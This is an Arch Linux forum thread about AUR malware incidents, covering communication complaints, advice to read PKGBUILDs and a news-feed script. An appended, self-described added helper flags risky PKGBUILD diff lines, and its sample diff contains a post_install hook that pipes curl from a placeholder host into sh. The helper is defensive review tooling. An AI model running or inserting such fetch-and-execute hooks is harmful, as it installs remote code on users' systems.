Moving to Debian; in my opinion this has not been communicated very well.
Just because of the AUR incident(s)? LoL
Last edited by 5hridhyan (Yesterday 18:14:45)
Yeah, kinda all my servers are now Debian, and this communication and uncertainty made me move.
gofree wrote: Moving to Debian; in my opinion this has not been communicated very well.
Just because of the AUR incident(s)? LoL
in my opinion this has not been communicated very well.
It would probably be more productive to quantify that communication deficit.
Fwiw, https://archlinux.org/news/
You can subscribe to that and I've also (previously posted) a script one could motd.
Sure I've seen that. Probably like every other guy I tried to find some "next steps - what needs to be done". Where is the list, what to check, etc...preferably on a visible place not hunting down reddit, phoronix, various forums for "semi-official" guides. That's something that could have been done better. Just my 2 cents.
Why is there so much outrage? The philosophy and scope of this project have been well known for a long time. Just because new people install Arch or use Arch derivatives, that doesn't change the goal of this project: the end responsibility is with the user. The AUR is not an official repo and should be examined when installing things. The Arch team can decide if they can take some measures for this incident, but I don't understand this finger wagging; nobody owes you anything, and if you are unhappy you can change distros.
Last edited by Reboot9012 (Yesterday 20:24:58)
No outrage here. I just think the scope of the impact deserved a wee bit more.
So this is essentially garbage, but considering that the main issue is Steam Deck users, and calling out violation of Arch Linux philosophy doesn't deter complaint,
I cobbled together a non-tested additional AUR check topology design in the AI slop phase for a centralized server maintaining problem-child repos and client-side checking of git AUR packages and URLs within the PKGBUILD, as well as common issues.
Maybe as something for someone to fork and deliver on.
Sure I've seen that. Probably like every other guy I tried to find some "next steps - what needs to be done". Where is the list, what to check, etc...preferably on a visible place not hunting down reddit, phoronix, various forums for "semi-official" guides. That's something that could have been done better. Just my 2 cents.
But that's the point: the AUR is **not** official software. And there is no possible definitive list of checks other than *either* do not use AUR packages *or* read the `PKGBUILD`s and ensure you are happy executing them. That list of checks is the **only** one which can give you any guarantees. It has also been the standard list of checks for as long as I have used Arch.
CLI Paste | How To Ask Questions
Arch Linux | x86_64 | GPT | EFI boot | refind | stub loader | systemd | LVM2 on LUKS
Lenovo x270 | Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz | Intel Wireless 8265/8275 | US keyboard w/ Euro | 512G NVMe INTEL SSDPEKKF512G7L
Fwiw, https://archlinux.org/news/
You can subscribe to that and I've also (previously posted) a script one could motd.
Is the script in another thread? I thought I checked through this one, but sorry if I missed it.
I was suspicious because I have `npm` installed and no idea why, but I apparently installed it 4 years ago, which is plenty of time for me to forget.
[I always read PKGBUILDs or diffs but I cannot say I understand everything or would never miss anything.]
Probably in the little scripts one or some other time somebody missed some news.
#!/bin/sh
# uses bash's $'...' quoting, so it needs bash (which /bin/sh is on Arch)
export LC_ALL=C
THIS_MONTH="$(date +'%b %Y')"
LAST_MONTH="$(date +'%b %Y' -d -1month)"
# fetch the news feed, keep the items dated this or last month, print date, title and body,
# then turn the HTML in the description into ANSI escapes and plain text
curl -sL 'https://archlinux.org/feeds/news/' | tr '\n' ' ' | \
xmlstarlet sel -T -t -m "//rss/channel/item[contains(string(pubDate), '$LAST_MONTH') or contains(string(pubDate), '$THIS_MONTH')]" \
-o $'\n\e[33m' -v pubDate -o $'\n\e[0;1m' -v title -o $'\e[0m' -v description -o $'\n\n────────────────\n' |\
sed $'s/<p>/\\n\\n/g; s/<h.>/\\n\\n\e[1;34m/g; s%</\(h.\|b\|em\|strong\|pre\|code\)>%\e[0m%g;
s/<li>/\\n· /g;
s/<\(code\|pre\)>/\e[1;32m/g;
s/<\(strong\|em\)>/\e[1m/g;
s/&gt;/>/g; s/&lt;/</g; s/<[^>]*>//g' | fold -sw 100
It just gets the rss feed, filters out the recent months and then turns the html into ansi escape sequences.
Fwiw, I think gofree meant to get some links to the relevant aur-general threads, maybe https://md.archlinux.org/s/SxbqukK6IA and something like https://ioctl.fail/preliminary-analysis-of-aur-malware/
Which is fair, though it would have been necessary to stress that the full extent of the compromise is still unknown and generally void returns from the above by no means prove that your system isn't ridden with malware if you've so far been yolo-ing the AUR.
I cannot say I understand everything or would never miss anything
Understanding that you don't understand most things is the entrance to the path of wisdom. I think I told that some greek dude like 2500 years ago…
The recent attacks have not been very sophisticated, the introduction of npm to those packages is completely nonsensical and would probably have stalled you, and the most recent stunt to obfuscate code basically yells "hey look at me, I'm doing something shady".
Arch Linux wiki pages, the AUR home page and forum users have warned that AUR packages are untrusted and need to be checked before use, etc., for 2 decades.
Using AUR helpers (especially pacman wrappers) is unsupported and a bad idea unless you know exactly how things work and why you need that specific AUR helper.
I am subscribed to all notifications of every AUR package I use and even keep those notifications on for packages I used to maintain.
The only notification of a commit change that was related to the attack was from the staden package which I started 15+ years ago.
If something needs to be shut down, my vote would be to ban all pacman wrappers as a starting point.
Disliking systemd intensely, but not satisfied with alternatives so focusing on taming systemd.
clean chroot building not flexible enough ?
Try clean chroot manager by graysky
While what is happening will not make me move anywhere else than Arch, and while I understand and agree that the AUR is under the exclusive responsibility of the user, I also agree that even a non-exhaustive guide on what to check to be sure a user has installed a malicious package might have been helpful.
There are probably things that I don't know and that led them to decide not to do it.
Last edited by kokoko3k (Today 10:19:08)
Help me to improve ssh-rdp !
Retroarch User? Try my koko-aio shader !
For the recent attack that's not too hard:
Almost all functionality for which .install files were needed has been moved to pacman hooks.
About the only thing .install is still used for is to show some warning to users upon install/upgrade/removal through the echo command.
Any aur package that adds a .install file should trigger all its users to check the .install file.
I am subscribed to all notifications of every AUR package I use and even keep those notifications on for packages I used to maintain.
That's a fantastic idea! AUR helpers should have an option to automatically do that. Does aurweb have an API?
I also agree that even a non-exhaustive guide on what to check to be sure a user has installed a malicious package might have been helpful.
If there needs to be a guide, I believe it will have to show how simple it is to read the average diff of a PKGBUILD, which in most cases is just a bump to a new version and a new checksum. The biggest misconception I've seen so many times is people believing that reading the PKGBUILD every time you update is time consuming, so they don't even try. In many cases people don't even know that the package source code and the PKGBUILD are different things.
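A small helper in the spirit of this post and of the ".install file" check a few posts up: it sorts an AUR PKGBUILD diff into the routine version/checksum bump and the lines that deserve reading. This is an added example, not code from the thread or from any AUR tooling; the sample diffs are constructed, and the list of things it flags (new .install files, install= lines, dependency changes, URLs, fetch-into-shell or decode/eval lines) is an assumption about what merits a second look.

```shell
#!/bin/sh
# Added example, not code from the thread: split an AUR PKGBUILD diff into "routine bump"
# and "read this before building". Reads a unified diff on stdin; exits 1 if anything is flagged.
review_pkgbuild_diff() {
    awk '
    function flag(why, what) { n++; printf "REVIEW: %s\n    %s\n", why, what }
    /^--- \/dev\/null/ { newfile = 1; next }   # the following +++ line names a brand new file
    /^\+\+\+ / { if (newfile && $2 ~ /\.install$/) flag("new .install file added, read it whole", $2)
                 newfile = 0; next }
    /^--- / { newfile = 0; next }
    /^\+/ {
        line = substr($0, 2); sub(/^[ \t]+/, "", line)
        if (line == "" || line ~ /^#/ || line ~ /^(pkgver|pkgrel|(sha[0-9]+|b2|md5)sums(_[a-z0-9_]+)?)=/) next
        if (line ~ /^[^A-Za-z0-9]*[0-9a-f]+[^A-Za-z0-9]*$/) next   # bare checksum inside an array
        if (line ~ /^install=/)
            flag("install= added to PKGBUILD, read the .install file", line)
        else if (line ~ /(curl|wget)[^|]*\|[ \t]*(ba)?sh|base64 +-d|eval /)
            flag("fetches into a shell, decodes or evals at build/install time", line)
        else if (line ~ /(https?|ftp):\/\/|git\+/)
            flag("added line carries a URL, check host and path", line)
        else if (line ~ /^(make|opt|check)?depends(_[a-z0-9_]+)?=/)
            flag("dependency list changed", line)
        else
            flag("other change to the build recipe, read it", line)
    }
    END { if (n == 0) print "routine bump: only version/checksum lines changed"; exit (n > 0) }'
}
# Constructed sample diffs (not real packages) so the function can be tried offline.
sample_routine_diff() { cat <<'EOF'
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -3,2 +3,2 @@
-pkgver=1.2.0
+pkgver=1.2.1
-sha256sums=('0123abcd')
+sha256sums=('4567ef01')
EOF
}
sample_suspicious_diff() { cat <<'EOF'
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -3,2 +3,4 @@
+pkgver=1.2.1
+install=foo.install
-depends=('python')
+depends=('python' 'npm')
--- /dev/null
+++ b/foo.install
@@ -0,0 +1 @@
+post_install() { curl -s https://example.invalid/x | sh; }
EOF
}
```

In a package clone, `git diff <last-reviewed-commit> | review_pkgbuild_diff` prints nothing but the "routine bump" line for the common case the post describes, and the flagged lines otherwise.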